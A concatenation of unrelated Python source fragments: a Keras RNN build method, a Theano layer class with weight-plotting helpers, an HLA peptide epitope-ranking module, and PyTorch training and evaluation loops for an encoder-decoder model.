def build(self, input_shape):
# Note input_shape will be list of shapes of initial states and
# constants if these are passed in __call__.
if self._num_constants is not None:
constants_shape = input_shape[-self._num_constants:] # pylint: disable=invalid-unary-operand-type
constants_shape = nest.map_structure(
lambda s: tuple(tensor_shape.TensorShape(s).as_list()),
constants_shape)
else:
constants_shape = None
if isinstance(input_shape, list):
input_shape = input_shape[0]
# The input_shape here could be a nest structure.
# do the tensor_shape to shapes here. The input could be single tensor, or a
# nested structure of tensors.
def get_input_spec(shape):
if isinstance(shape, tensor_shape.TensorShape):
input_spec_shape = shape.as_list()
else:
input_spec_shape = list(shape)
batch_index, time_step_index = (1, 0) if self.time_major else (0, 1)
if not self.stateful:
input_spec_shape[batch_index] = None
input_spec_shape[time_step_index] = None
return InputSpec(shape=tuple(input_spec_shape))
def get_step_input_shape(shape):
if isinstance(shape, tensor_shape.TensorShape):
shape = tuple(shape.as_list())
# remove the timestep from the input_shape
return shape[1:] if self.time_major else (shape[0],) + shape[2:]
# Check whether the input shape contains any nested shapes. | |
"""
All parameters (excluding superparameters) in the model should be in theano var-
iables or theano shared values. In the training part, these variables should be
organized into "theano.function"s. So there should be no theano.function in the
definition of models here. Except for analysis part of codes.
"""
import numpy
import theano
import theano.tensor as T
from theano.tensor.nnet import conv
from theano.tensor.signal import pool
import matplotlib
# matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pdb
class Layer(object):
    """Abstract base class for a single network layer.

    Subclasses implement the symbolic graph pieces (`fanin`, `output`,
    `activ_prime`).  The base class also supports stacking layers with the
    `+` operator and provides matplotlib-based analysis helpers for
    visualizing weights, biases and activations.
    """
    def __init__(self, n_in, n_out, varin=None):
        """
        Parameters
        -----------
        n_in : int
            Input dimensionality.
        n_out : int
            Output dimensionality.
        varin : theano.tensor.TensorVariable, optional
            Symbolic input; a fresh matrix variable is created if omitted.
        """
        self.n_in = n_in
        self.n_out = n_out
        # `is None` instead of truth-testing: truth-testing a symbolic
        # theano variable is error-prone.
        if varin is None:
            varin = T.matrix('varin')
        assert isinstance(varin, T.TensorVariable)
        self.varin = varin
        if not hasattr(self, 'params'):
            self.params = []  # to be implemented by subclass
        self.patch_ind = numpy.asarray([])  # needed by plotting.
        self.givens_activation = {}  # hist_activation() is going to need it.
    def fanin(self):
        """Symbolic pre-activation (weighted input) of the layer."""
        raise NotImplementedError("Must be implemented by subclass.")
    def output(self):
        """Symbolic activation (output) of the layer."""
        raise NotImplementedError("Must be implemented by subclass.")
    def activ_prime(self):
        """
        Value of derivative of the activation function w.r.t fanin(), given
        fanin() as the argument of the derivative function.
        """
        raise NotImplementedError("Must be implemented by subclass.")
    def _print_str(self):
        return self.__class__.__name__ + ": " + str(self.n_in) + " --> " \
            + str(self.n_out)
    def print_layer(self):
        # print() with a single argument is valid on both Python 2 and 3;
        # the former `print x` statement form is a SyntaxError on Python 3.
        print(self._print_str())
    def __add__(self, other):
        """It is used for conveniently constructing stacked layers."""
        assert isinstance(other, Layer), "Addition not defined."
        # Flatten either side so the result is never a nested StackedLayer.
        if hasattr(self, 'models_stack'):
            models_left = self.models_stack
        else:
            models_left = [self]
        if hasattr(other, 'models_stack'):
            models_right = other.models_stack
        else:
            models_right = [other]
        models_stack = models_left + models_right
        return StackedLayer(models_stack=models_stack, varin=self.varin)
    # Following are for analysis ----------------------------------------------
    def wTw(self, verbose=True, filename='wTw_layerw.png'):
        """Plot W^T W as an image; compiles the theano getter lazily once."""
        assert hasattr(self, 'w'), "The layer need to have weight defined."
        if not hasattr(self, '_wTw'):
            self.get_w_cov = theano.function([], T.dot(self.w.T, self.w))
            self._wTw = plt.figure()
            self.wTw_ax = self._wTw.add_subplot(111)
            plt.gray()
            plt.title(self._print_str() + ': wTw')
            self.wTw_ip = self.wTw_ax.imshow(self.get_w_cov())
        else:
            self.wTw_ip.set_data(self.get_w_cov())
        self._wTw.canvas.draw()
        if verbose:
            plt.pause(0.05)
        else:
            plt.savefig(filename)
    def naiveplot_weight(self, verbose=True,
                         filename='naiveplot_layerw.png'):
        """Show the raw weight matrix as an image."""
        assert hasattr(self, 'w'), "The layer need to have weight defined."
        if not hasattr(self, '_naiveplot_weight'):
            if not hasattr(self, 'get_w'):
                self.get_w = theano.function([], self.w.T.T)
            self._naiveplot_weight = plt.figure()
            self.naive_ax = self._naiveplot_weight.add_subplot(111)
            plt.gray()
            plt.title('weight matrix ' + self._print_str())
            self.naive_ip = self.naive_ax.imshow(self.get_w())
        else:
            self.naive_ip.set_data(self.get_w())
        self._naiveplot_weight.canvas.draw()
        if verbose:
            plt.pause(0.05)
        else:
            plt.savefig(filename)
    def hist_weight(self, verbose=True, filename='hist_layerw.png'):
        """Plot a 50-bin histogram of all weight values.

        Parameters
        -----------
        verbose : bool
            If True, show interactively; otherwise save to `filename`.
        filename : string
        """
        assert hasattr(self, 'w'), "The layer need to have weight defined."
        if not hasattr(self, '_hist_weight'):
            if not hasattr(self, 'get_w'):
                self.get_w = theano.function([], self.w.T.T)
            self._hist_weight = plt.figure()
            self.hist_ax = self._hist_weight.add_subplot(111)
        else:
            self.hist_ax.cla()
        n, bins, patches = self.hist_ax.hist(
            self.get_w().flatten(), 50, facecolor='blue'
        )
        self._hist_weight.canvas.draw()
        plt.title('weight histogram ' + self._print_str())
        if verbose:
            plt.pause(0.05)
        else:
            plt.savefig(filename)
    def draw_weight(self, patch_shape=None, map_function=None, npatch=None,
                    border=1, bordercolor=(0.0, 0.0, 0.0),
                    verbose=True, filename='draw_layerw.png',
                    *imshow_args, **imshow_keyargs):
        """
        Adapted from <NAME>'s code.
        Display an array of images in RGB or grey format.
        Parameters
        -----------
        patch_shape : tuple of integers, has to contain 3 entries.
            First and second entries for the size on X and Y direction, the
            third entry for the number of channels. So the third entry has to
            be 1 for grey image or 3 for RGB image.
        map_function : theano.function
            Maps the weight back through the preprocessing steps to get
            reasonable representations of the filters. It should take no
            inputs and output the desired representation of weights.
        npatch : int
        border : int
            Size of the border.
        bordercolor : a tuple of 3 entries.
            Stands for the RGB value of border.
        verbose : bool
        filename : str
        Notes
        -----------
        Map the weights into a reasonable representation by applying them
        onto a theano function 'map_function'. If not given, it displays
        weights by directly reshaping them to the shape specified by
        patch_shape. The weight array should finally be in the shape of:
            npatch x patch_shape[0] x patch_shape[1] x patch_shape[2]
        Here we assume that the map_fun, or the input to the layer if map_fun
        is not provided, are placed in the order of [RRRRGGGGBBBB].
        """
        assert hasattr(self, 'w'), "The layer need to have weight defined."
        if map_function is None:
            if not hasattr(self, 'get_w'):
                self.get_w = theano.function([], self.w.T.T)
            M = self.get_w()
            if len(M.shape) == 2:
                M = M.T
        else:
            assert isinstance(
                map_function,
                theano.compile.function_module.Function
            ), "map_function has to be a theano function with no input."
            M = map_function()
        if len(M.shape) == 2:  # FC weight matrix
            assert M.shape[0] == self.n_out, (
                "Wrong M row numbers. Should be %d " % self.n_out + \
                "but got %d." % M.shape[0])
            max_patchs = self.n_out
        elif len(M.shape) == 4:  # ConvNet filter
            # This will still cause problem for deeper Conv layers.
            assert patch_shape is None, (
                "You don't need to specify a patch_shape for ConvNet layers.")
            patch_shape = (M.shape[2], M.shape[3], M.shape[1])
            max_patchs = M.shape[0]
            # (n, c, h, w) -> (n, h, w, c)
            M = numpy.swapaxes(M, 1, 3)
            M = numpy.swapaxes(M, 2, 3)
        if npatch is None:
            npatch = max_patchs
        else:
            assert npatch <= max_patchs, ("Too large npatch size. Maximum "
                                          "allowed value %d " % max_patchs + \
                                          "but got %d." % npatch)
            if npatch != len(self.patch_ind):
                # Sample a fixed random subset of patches, reused across
                # calls (seeded RNG, so the selection is reproducible).
                if not hasattr(self, 'npy_rng'):
                    self.npy_rng = numpy.random.RandomState(123)
                self.patch_ind = self.npy_rng.permutation(max_patchs)[:npatch]
            M = M[self.patch_ind, :]
        bordercolor = numpy.array(bordercolor)[None, None, :]
        M = M.copy()
        assert patch_shape is not None, ("Need a patch_shape for this case.")
        # Normalize each patch to [0, 1].
        # NOTE(review): a constant patch divides by zero here -- TODO confirm
        # whether constant filters can occur in practice.
        for i in range(M.shape[0]):
            M[i] -= M[i].flatten().min()
            M[i] /= M[i].flatten().max()
        height, width, channel = patch_shape
        if channel == 1:
            M = numpy.tile(M, 3)  # replicate grey values into 3 channels
        elif channel != 3:
            raise ValueError(
                "3rd entry of patch_shape has to be either 1 or 3."
            )
        try:
            M = M.reshape((npatch, height, width, 3), order='F')
        except ValueError:
            # Narrowed from a bare `except:`; reshape size mismatches raise
            # ValueError.
            raise ValueError("Wrong patch_shape.")
        # builtin int replaces numpy.int (alias removed in NumPy 1.24).
        vpatches = int(numpy.ceil(numpy.sqrt(npatch)))
        hpatches = int(numpy.ceil(numpy.sqrt(npatch)))
        vstrike = width + border
        hstrike = height + border
        # initialize image size with border color
        im = numpy.array(bordercolor) * numpy.ones((hstrike * hpatches + border,
                                                    vstrike * vpatches + border,
                                                    1), dtype='<f8')
        for i in range(vpatches):
            for j in range(hpatches):
                if i * hpatches + j < npatch:
                    im[
                        j * hstrike + border:j * hstrike + border + height,
                        i * vstrike + border:i * vstrike + border + width,
                        :
                    ] = M[i * hpatches + j, :, :, :]
        if not hasattr(self, '_draw_weight'):
            imshow_keyargs["interpolation"] = "nearest"
            self._draw_weight = plt.figure()
            self.draw_ax = self._draw_weight.add_subplot(111)
            self.wimg = self.draw_ax.imshow(im, *imshow_args, **imshow_keyargs)
        else:
            self.wimg.set_data(im)
        self._draw_weight.canvas.draw()
        plt.title('weight plot ' + self._print_str())
        if verbose:
            plt.pause(0.05)
        else:
            plt.savefig(filename)
    def hist_bias(self, verbose=True, filename='hist_layerb.png'):
        """Plot a 50-bin histogram of the bias values.

        Parameters
        -----------
        verbose : bool
            If True, show interactively; otherwise save to `filename`.
        filename : string
        """
        assert hasattr(self, 'b'), "The layer need to have biases defined."
        if not hasattr(self, '_hist_bias'):
            if not hasattr(self, 'get_b'):
                self.get_b = theano.function([], self.b)
            self._hist_bias = plt.figure()
            self.histb_ax = self._hist_bias.add_subplot(111)
        else:
            self.histb_ax.cla()
        n, bins, patches = self.histb_ax.hist(
            self.get_b().flatten(), 50, facecolor='c'
        )
        self._hist_bias.canvas.draw()
        plt.title('bias histogram ' + self._print_str())
        if verbose:
            plt.pause(0.05)
        else:
            plt.savefig(filename)
    def hist_activation(self, givens=None, verbose=True,
                        filename='hist_activation.png'):
        """Plot a 50-bin histogram of the layer's activations.

        Parameters
        -----------
        givens : dict, optional
            Specify the inputs needed for computing the activation in this
            layer; passed to the `givens` parameter while building the
            theano function. Passing a different dict triggers a recompile.
            Defaults to {} (was a mutable default argument).
        verbose : bool
        filename : string
        """
        if givens is None:
            givens = {}
        # Recompile on first call OR when `givens` changed, as the docstring
        # promises.  (Previously this check was nested under the first-call
        # branch, so a changed `givens` never triggered a recompile.)
        if not hasattr(self, 'get_activation') or \
                self.givens_activation != givens:
            self.givens_activation = givens
            self.get_activation = theano.function(
                [], self.output(), givens=givens)
        if not hasattr(self, '_hist_activation'):
            self._hist_activation = plt.figure()
            self.histact_ax = self._hist_activation.add_subplot(111)
        else:
            self.histact_ax.cla()
        n, bins, patches = self.histact_ax.hist(
            self.get_activation().flatten(), 50, facecolor='red'
        )
        self._hist_activation.canvas.draw()
        plt.title('activation histogram ' + self._print_str())
        if verbose:
            plt.pause(0.05)
        else:
            plt.savefig(filename)
class StackedLayer(Layer):
def __init__(self, models_stack=[], varin=None):
"""
Ensure the following things:
1. By calling StackedLayer([...], [...]) we definitely get a stacked la-
yer.
2. StackedLayer as a whole can be viewed as a 1-layer model. (i.e. it
guarantees all features of Layer in an appropriate way.)
3. By calling
Layer(...) + Layer(...),
Layer(...) + StackedLayer(...),
StackedLayer(...) + Layer(...), or
StackedLayer(...) + StackedLayer(...)
we can get a *non-nested* StackedLayer object at its expression
value.
Although in the implementation of Layer and StackedLayer class we
carefully ensure that nested StackedLayer (i.e. a StackedLayer of
StackedLayers) does not cause problem, it | |
import numpy as np
import string
import re
# Public API of this module.
__all__ = ['BADAA',
           'AALPHABET',
           'convertHLAAsterisk',
           'isvalidmer',
           'isvalidHLA',
           'rankEpitopes',
           'rankKmers',
           'rankMers',
           'getIC50',
           'getMers',
           'getMerInds',
           'grabKmer',
           'grabKmerInds',
           'findpeptide',
           'grabOverlappingKmer',
           'overlappingMers']
# Characters that must not appear in a valid peptide (gap '-', stop '*',
# ambiguity codes B/X/Z, '#', '?', whitespace); used by isvalidmer().
BADAA = '-*BX#Z? '
# The 20 standard amino-acid one-letter codes.
AALPHABET = 'ACDEFGHIKLMNPQRSTVWY'
def convertHLAAsterisk(hlas):
    """Replace the '*' with '_' in each HLA allele name.

    Parameters
    ----------
    hlas : iterable of str
        HLA allele names, e.g. 'A*0201'.

    Returns
    -------
    list of str
        Same alleles with every '*' replaced by '_', e.g. 'A_0201'.
    """
    # str.replace handles the literal character directly; the previous
    # regex used the non-raw pattern '\*', which is an invalid escape
    # sequence warning on modern Python.
    return [h.replace('*', '_') for h in hlas]
def isvalidmer(mer):
    """Return True if `mer` is a non-None peptide with no invalid
    amino-acid characters (any character listed in BADAA).

    Parameters
    ----------
    mer : str or None

    Returns
    -------
    bool
    """
    if mer is None:  # was `not mer is None` (anti-idiom)
        return False
    # re.search returns None when no bad character is found.
    return not re.search('[%s]' % BADAA, mer)
def isvalidHLA(h, loci='AB'):
    """Return True if the HLA allele `h` belongs to one of the given loci.

    Parameters
    ----------
    h : str
        Allele name whose first character is its locus (e.g. 'A_0201').
    loci : str
        Accepted locus letters (default 'AB').

    Returns
    -------
    bool
        Also returns False for an empty string (previously an IndexError).
    """
    return h.startswith(tuple(loci))
def rankEpitopes(ba, hlaList, peptide, nmer = [8, 9, 10, 11], peptideLength = None):
    """Rank every (HLA, kmer) pair from `peptide` by predicted IC50.

    Breaks `peptide` into all kmers of the lengths in `nmer` (padding with
    '.' up to `peptideLength` if given) and ranks every (HLA, kmer) pair by
    the predicted IC50 in `ba`.  Pairs missing from `ba` get a placeholder
    prediction of 15 log-nM.  Functionally identical to rankKmers().

    Parameters
    ----------
    ba : hlaPredCache
        Dict-like container of (hla, kmer) -> log-IC50.
    hlaList : list
        HLA alleles used as keys into `ba`.
    peptide : str
        AA sequence.
    nmer : list
        Kmer lengths to evaluate.
    peptideLength : int or None
        If given, pad with '.' so the number of kmers is fixed.

    Returns
    -------
    (ranks, sorti, kmers, ic50, hla) : tuple of ndarrays
        Zero-based IC50 ranks, the argsort index, the kmer of each pair,
        the predicted log-IC50 of each pair, and the HLA of each pair.
    """
    merList = getMers(peptide, nmer, peptideLength)
    nMers, nHLA = len(merList), len(hlaList)
    kmers = np.empty((nMers, nHLA), dtype=object)
    hla = np.empty((nMers, nHLA), dtype=object)
    ic50 = np.ones((nMers, nHLA)) * 15  # placeholder prediction
    for row, mer in enumerate(merList):
        for col, allele in enumerate(hlaList):
            kmers[row, col] = mer
            hla[row, col] = allele
            pred = ba[(allele, mer)]
            if not np.isnan(pred):
                ic50[row, col] = pred
    kmers = kmers.flatten()
    ic50 = ic50.flatten()
    hla = hla.flatten()
    sorti = ic50.argsort()
    ranks = np.empty(len(ic50), int)
    ranks[sorti] = np.arange(len(ic50))
    return (ranks, sorti, kmers, ic50, hla)
def rankKmers(ba, hlaList, peptide, nmer=[8, 9, 10, 11], peptideLength=None):
    """Rank every (HLA, kmer) pair from `peptide` by predicted IC50.

    Splits `peptide` into kmers of each length in `nmer` (padding with '.'
    up to `peptideLength` if given) and delegates the ranking to
    rankMers().  Missing predictions default to 15 log-nM.  Functionally
    identical to rankEpitopes().

    Parameters
    ----------
    ba : hlaPredCache
        Dict-like container of (hla, kmer) -> log-IC50.
    hlaList : list
        HLA alleles used as keys into `ba`.
    peptide : str
        AA sequence.
    nmer : list
        Kmer lengths to evaluate.
    peptideLength : int or None
        If given, pad with '.' so the number of kmers is fixed.

    Returns
    -------
    (ranks, sorti, kmers, ic50, hla) : tuple
        Zero-based IC50 ranks, the argsort index, the kmer strings in
        getMers() order, the best log-IC50 per kmer, and the best-binding
        HLA per kmer.
    """
    allKmers = getMers(peptide, nmer, peptideLength)
    ranks, sorti, ic50, bestHLA = rankMers(ba, hlaList, allKmers)
    return (ranks, sorti, allKmers, ic50, bestHLA)
def rankMers(ba, hlaList, merList):
    """Rank the given mers by their best predicted IC50 over `hlaList`.

    Mers containing '.' (padding) keep the placeholder prediction of
    15 log-nM and are never looked up in `ba`.

    Parameters
    ----------
    ba : hlaPredCache
        Dict-like container of (hla, kmer) -> log-IC50.
    hlaList : list
        HLA alleles used as keys into `ba`.
    merList : list
        Peptide sequences to test against each HLA allele.

    Returns
    -------
    (ranks, sorti, ic50, hla) : tuple of ndarrays
        Zero-based IC50 ranks, the argsort index, the best log-IC50 per
        mer, and the best-binding HLA per mer.
    """
    nMers = len(merList)
    ic50 = np.ones(nMers) * 15  # placeholder prediction
    hla = np.empty(nMers, dtype=object)
    for idx, mer in enumerate(merList):
        if '.' not in mer:
            ic50[idx], hla[idx] = getIC50(ba, hlaList, mer, returnHLA=True)
    sorti = np.argsort(ic50)
    ranks = np.empty(nMers, dtype=int)
    ranks[sorti] = np.arange(nMers)
    return (ranks, sorti, ic50, hla)
def getIC50(ba, hlaList, mer, nmer=[8, 9, 10, 11], returnHLA=False):
    """Best (minimum) predicted log-IC50 of `mer` over the HLAs in `hlaList`.

    Peptides longer than 11 AA are broken into kmers (lengths in `nmer`)
    and the minimum over all (kmer, HLA) pairs is returned.

    Parameters
    ----------
    ba : hlaPredCache
        Dict-like container of (hla, kmer) -> log-IC50.
    hlaList : list
        HLA alleles used as keys into `ba`.
    mer : str
        Peptide sequence.
    nmer : list
        Kmer lengths used when `mer` is longer than 11 AA.
    returnHLA : bool
        If True, also return the HLA with the lowest IC50.

    Returns
    -------
    ic50 : float
        Best log-IC50 from `ba`.
    hla : str (only when returnHLA is True)
        HLA allele achieving that best binding.
    """
    if ba is None:
        raise NameError('Did not load IC50 values into ba!')
    if len(mer) > 11:
        # Long peptide: recurse over its kmers, keeping the best HLA per kmer.
        pairs = [getIC50(ba, hlaList, sub, returnHLA=True)
                 for sub in getMers(mer, nmer)]
        ic50s = np.asarray([pred for pred, _ in pairs])
        hlas = [allele for _, allele in pairs]
    else:
        # Short enough to look up directly: minimum over the HLAs.
        ic50s = np.asarray([ba[(h, mer)] for h in hlaList])
        hlas = hlaList
    best = np.argmin(ic50s)
    if returnHLA:
        return ic50s[best], hlas[best]
    else:
        return ic50s[best]
def getMers(seq, nmer=[8, 9, 10, 11], seqLength=None):
    """Break an AA sequence into all kmers of the lengths in `nmer`.

    The seq is truncated to `seqLength`, or padded with '.' if shorter,
    which guarantees a fixed number of kmers. The kmer order matches the
    indices produced by getMerInds().

    Parameters
    ----------
    seq : str
        Peptide sequence.
    nmer : list
        List of k's for the creation of all kmers.
    seqLength : int, optional
        Exact length of seq used ('.'-padded or truncated before kmerizing).

    Returns
    -------
    mers : list
        All substrings of each length in `nmer` contained by seq.
    """
    if seqLength is not None:  # was `not seqLength is None` (anti-idiom)
        if len(seq) > seqLength:
            seq = seq[:seqLength]
        elif len(seq) < seqLength:
            # str.ljust replaces string.ljust, which was removed in
            # Python 3 (the old call crashes with AttributeError).
            seq = seq.ljust(seqLength, '.')
    mers = []
    for n in nmer:
        mers.extend([seq[i:i + n] for i in range(len(seq) - n + 1)])
    return mers
def getMerInds(seq, nmer=[8, 9, 10, 11], seqLength=None):
"""Takes a AA sequence (string) and turns it into a list of 8, 9, 10, 11 mers
The seq will be padded with one or more '.' if it is shorter than seqLength
These indices will match the peptides created by getMers()
    Parameters
---------
seq : str
Peptide sequence.
nmer : list
List of k's for the creation of all kmers.
seqLength : int
Minimum length of seq ('.' used for padding before applying the process)
Useful for garaunteeing that a certain number of kmers will be in the list.
Returns
-------
mers : list
All peptides of length nmer contained by seq
mers : list
Seq indices for mers"""
if not seqLength is None:
| |
# python/train_and_eval.py
import torch, random, sys, torch.nn as nn, re
from utils import *
def train(args, encoder, decoder, criterion, encoder_optimizer, decoder_optimizer, train_dl, epoch, visualize=False, params=None):
    """
    Run one teacher-forced training epoch over `train_dl`.

    Teacher forcing is chosen per batch with probability
    args.teacher_forcing_ratio; the non-teacher-forcing branch is explicitly
    unsupported and exits the process.  Returns an EvaluationResult with the
    epoch's total loss and token count, or None early when `visualize` is
    set (after the first decode).
    """
    if encoder:
        # encoder may be None for decoder-only models.
        encoder.train()
    decoder.train()
    total_loss = 0.0
    total_tokens = 0.0
    total_loss_unmutated = 0.0 # similar to above but not mutated to zero when logging
    total_tokens_unmutated = 0.0 # similar to above but not mutated to zero when logging
    for i, (encoder_inputs, decoder_inputs, decoder_outputs, _) in enumerate(train_dl):
        # one training example
        if args.development_mode and i == 100:
            break  # short-circuit epoch for fast dev iterations
        if encoder_optimizer:
            encoder_optimizer.zero_grad()
        decoder_optimizer.zero_grad()
        # Empty EncoderContext stands in when there is no encoder.
        encoder_context = encoder(encoder_inputs) if encoder else EncoderContext()
        encoder_context = initialize_with_context(encoder, decoder, encoder_context, args)
        use_teacher_forcing = True if random.random() < args.teacher_forcing_ratio else False
        if use_teacher_forcing:
            loss = decode(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion, visualize=visualize, params=params)
            if visualize:
                return None
        else: # FIXME: Fix this # NOTE: BROKEN! DO NOT USE!
            print("Error: non-teacher forcing is not supported at this time.")
            sys.exit(0)
            # decoder_input = target_inputs[0].view(1, -1)
            # for t in range(len(target_inputs[0])):
            # decoder_output, decoder_hidden, decoder_attn = decoder(decoder_input, decoder_hidden, encoder_outputs)
            # _, topi = decoder_output.topk(1) # [64, 1]
            # decoder_input = torch.LongTensor([[topi[i][0] for i in range(batch_size)]])
            # decoder_input = decoder_input.to(device)
            # loss += criterion(decoder_output, target_outputs[0][t])
        target_outputs = decoder_outputs.target_outputs
        # Normalize by target length so gradient magnitude does not scale
        # with sequence length.
        normalized_loss = loss / float(len(target_outputs[0]))
        normalized_loss.backward()
        total_tokens += len(target_outputs[0])
        total_tokens_unmutated += len(target_outputs[0])
        if encoder:
            rnn_encoder_modules = list(
                filter(lambda x: isinstance(x, nn.GRU) or isinstance(x, nn.LSTM), list(encoder.modules()))
            )
            if rnn_encoder_modules: # clip only when there is an encoder AND RNNs exists in encoder
                torch.nn.utils.clip_grad_norm_(encoder.parameters(), args.clip) # TODO: clip gradients for the RNN params only?
        torch.nn.utils.clip_grad_norm_(decoder.parameters(), args.clip)
        if encoder_optimizer:
            encoder_optimizer.step()
        decoder_optimizer.step()
        total_loss += loss.item()
        total_loss_unmutated += loss.item()
        # print logging info
        if (args.log_step and i > 0 and i % args.log_step == 0) or (i == len(train_dl) - 1):
            # batch_size here = number of batches accumulated since the last
            # log line (edge cases for the first window and the final,
            # possibly partial, window).
            # NOTE(review): the `% args.log_step - 1` arithmetic for the
            # final window looks off-by-one-prone -- TODO confirm against a
            # dataloader whose length is a multiple of log_step.
            if i == args.log_step:
                batch_size = args.log_step + 1
            elif i == len(train_dl) - 1:
                batch_size = len(train_dl) % args.log_step - 1
            else:
                batch_size = args.log_step
            avg_loss_per_example = total_loss / float(batch_size)
            avg_loss_per_word = total_loss / total_tokens
            print(timestamp(), 'Epoch [%d/%d] | Step [%d/%d] | Loss: %.4f | Perplexity: %5.4f'
                %(epoch, args.num_epochs, i, len(train_dl) - 1, avg_loss_per_example, np.exp(avg_loss_per_word)))
            total_loss = 0.0
            total_tokens = 0.0
    return EvaluationResult(total_loss_unmutated, total_tokens_unmutated)
def train_mrl(args, encoder, decoder, criterion_xent, criterion_mrl, encoder_optimizer, decoder_optimizer, train_dl, epoch, mrl_factor=1.0, alternate_updates=False, use_xent_criterion=False):
    """
    Train for one epoch with two objectives: teacher-forced cross-entropy
    ('xent') and a margin ranking loss ('mrl') that contrasts the model's score
    for the positive target sequence against a negative (contrastive) one.

    Args:
        args: namespace providing development_mode, teacher_forcing_ratio,
            clip, log_step and num_epochs.
        encoder: optional encoder module (may be None/falsy).
        decoder: decoder module.
        criterion_xent: per-token cross-entropy criterion.
        criterion_mrl: margin ranking criterion (takes score1, score2, target).
        encoder_optimizer: optimizer for the encoder (may be None).
        decoder_optimizer: optimizer for the decoder.
        train_dl: dataloader yielding
            (encoder_inputs, decoder_inputs, decoder_outputs, _) batches.
        epoch: current epoch index, used for logging only.
        mrl_factor: NOTE(review): accepted but never read in this function --
            confirm whether it was meant to weight the two objectives.
        alternate_updates: if True, apply only one objective per batch,
            alternating by batch index; otherwise apply both every batch.
        use_xent_criterion: forwarded to decode_mrl to choose its scoring mode.

    Returns:
        EvaluationResult wrapping the total accumulated loss for the epoch.
    """
    if encoder:
        encoder.train()
    decoder.train()
    total_loss = 0.0  # running loss, reset to zero after each log line
    total_loss_unmutated = 0.0 # similar to above but not mutated to zero when logging
    for i, (encoder_inputs, decoder_inputs, decoder_outputs, _) in enumerate(train_dl):
        if args.development_mode and i == 100:
            # short-circuit for quick smoke-test runs
            break
        criteria = ['xent', 'mrl']
        if alternate_updates:
            # exactly one objective per batch, alternating between the two
            criteria = [criteria[i%2]]
        for ckey in criteria:
            if encoder_optimizer:
                encoder_optimizer.zero_grad()
            decoder_optimizer.zero_grad()
            use_teacher_forcing = True if random.random() < args.teacher_forcing_ratio else False
            if use_teacher_forcing:
                if ckey == 'xent':
                    encoder_context = encoder(encoder_inputs) if encoder else EncoderContext()
                    encoder_context = initialize_with_context(encoder, decoder, encoder_context, args)
                    loss = decode(decoder, decoder_inputs, decoder_outputs, encoder_context, criterion_xent)
                    target_outputs = decoder_outputs.target_outputs
                    # normalize by target length so gradient scale is comparable across batches
                    normalized_loss = loss / float(len(target_outputs[0]))
                    normalized_loss.backward()
                elif ckey == 'mrl':
                    # score the positive target sequence...
                    encoder_context_1 = encoder(encoder_inputs) if encoder else EncoderContext()
                    encoder_context_1 = initialize_with_context(encoder, decoder, encoder_context_1, args)
                    loss1 = decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context_1, criterion_xent, use_neg_sample=False, use_xent_criterion=use_xent_criterion)
                    normalized_loss1 = loss1 / float(len(decoder_outputs.target_outputs[0]))
                    # ...and the negative (contrastive) target sequence
                    encoder_context_2 = encoder(encoder_inputs) if encoder else EncoderContext()
                    encoder_context_2 = initialize_with_context(encoder, decoder, encoder_context_2, args)
                    loss2 = decode_mrl(decoder, decoder_inputs, decoder_outputs, encoder_context_2, criterion_xent, use_neg_sample=True, use_xent_criterion=use_xent_criterion)
                    normalized_loss2 = loss2 / float(len(decoder_outputs.target_outputs_neg[0]))
                    # target=-1 asks the ranking loss to rank score2 above score1
                    # NOTE(review): torch.FloatTensor((1)) == torch.FloatTensor(1):
                    # a size-1 uninitialized tensor then filled; (1,) was likely intended.
                    target = torch.FloatTensor((1)).fill_(-1)
                    target = to_var(target)
                    loss = criterion_mrl(normalized_loss1.unsqueeze(0), normalized_loss2.unsqueeze(0), target)
                    loss.backward()
            else: # FIXME: Fix this # NOTE: BROKEN! DO NOT USE!
                print("Error: non-teacher forcing is not supported at this time.")
                sys.exit(0)
            if encoder:
                rnn_encoder_modules = list(
                    filter(lambda x: isinstance(x, nn.GRU) or isinstance(x, nn.LSTM), list(encoder.modules()))
                )
                if rnn_encoder_modules: # clip only when there is an encoder AND RNNs exists in encoder
                    torch.nn.utils.clip_grad_norm_(encoder.parameters(), args.clip) # TODO: clip gradients for the RNN params only?
                    torch.nn.utils.clip_grad_norm_(decoder.parameters(), args.clip)
            if encoder_optimizer:
                encoder_optimizer.step()
            decoder_optimizer.step()
            total_loss += loss.item()
            total_loss_unmutated += loss.item()
        # print logging info
        if (args.log_step and i > 0 and i % args.log_step == 0) or (i == len(train_dl) - 1):
            # recover how many batches contributed to total_loss since the last log
            # NOTE(review): the final-batch branch can yield 0 or -1 when
            # len(train_dl) is a multiple of log_step -- confirm intended.
            if i == args.log_step:
                batch_size = args.log_step + 1
            elif i == len(train_dl) - 1:
                batch_size = len(train_dl) % args.log_step - 1
            else:
                batch_size = args.log_step
            avg_loss_per_example = total_loss / float(batch_size)
            print(timestamp(), 'Epoch [%d/%d] | Step [%d/%d] | Loss: %.4f'
                %(epoch, args.num_epochs, i, len(train_dl) - 1, avg_loss_per_example))
            total_loss = 0.0
    return EvaluationResult(total_loss_unmutated)
def eval(args, encoder, decoder, criterion, dev_dl):
    """
    Compute the teacher-forced validation loss over dev_dl.

    Puts encoder (if any) and decoder into eval mode, runs every dev batch
    through decode under torch.no_grad(), and accumulates the summed loss and
    the number of target tokens seen.

    NOTE: the name shadows the builtin ``eval``; kept for caller compatibility.

    Returns:
        EvaluationResult(total_validation_loss, total_token_count)
    """
    if encoder:
        encoder.eval()
    decoder.eval()
    running_loss = 0.0
    token_count = 0.0
    with torch.no_grad():
        for batch_idx, batch in enumerate(dev_dl):
            encoder_inputs, decoder_inputs, decoder_outputs, _ = batch
            if args.development_mode and batch_idx == 1:
                # in dev mode, evaluate a single batch only
                break
            context = encoder(encoder_inputs) if encoder else EncoderContext()
            context = initialize_with_context(encoder, decoder, context, args)
            batch_loss = decode(decoder, decoder_inputs, decoder_outputs, context, criterion)
            running_loss += batch_loss.item()
            token_count += len(decoder_outputs.target_outputs[0])
    return EvaluationResult(running_loss, token_count)
def eval_mrl(args, encoder, decoder, criterion_xent, criterion_mrl, dev_dl, mrl_factor=1.0, use_xent_criterion=False):
    """
    Validation pass for the joint cross-entropy + margin-ranking objective.

    For each dev batch, accumulates (a) the teacher-forced cross-entropy loss
    and (b) the margin ranking loss between the length-normalized scores of the
    positive and negative target sequences. Token counts are accumulated once
    per objective, mirroring the loss accumulation. ``mrl_factor`` is accepted
    for signature compatibility but unused.

    Returns:
        EvaluationResult(total_validation_loss, total_token_count)
    """
    if encoder:
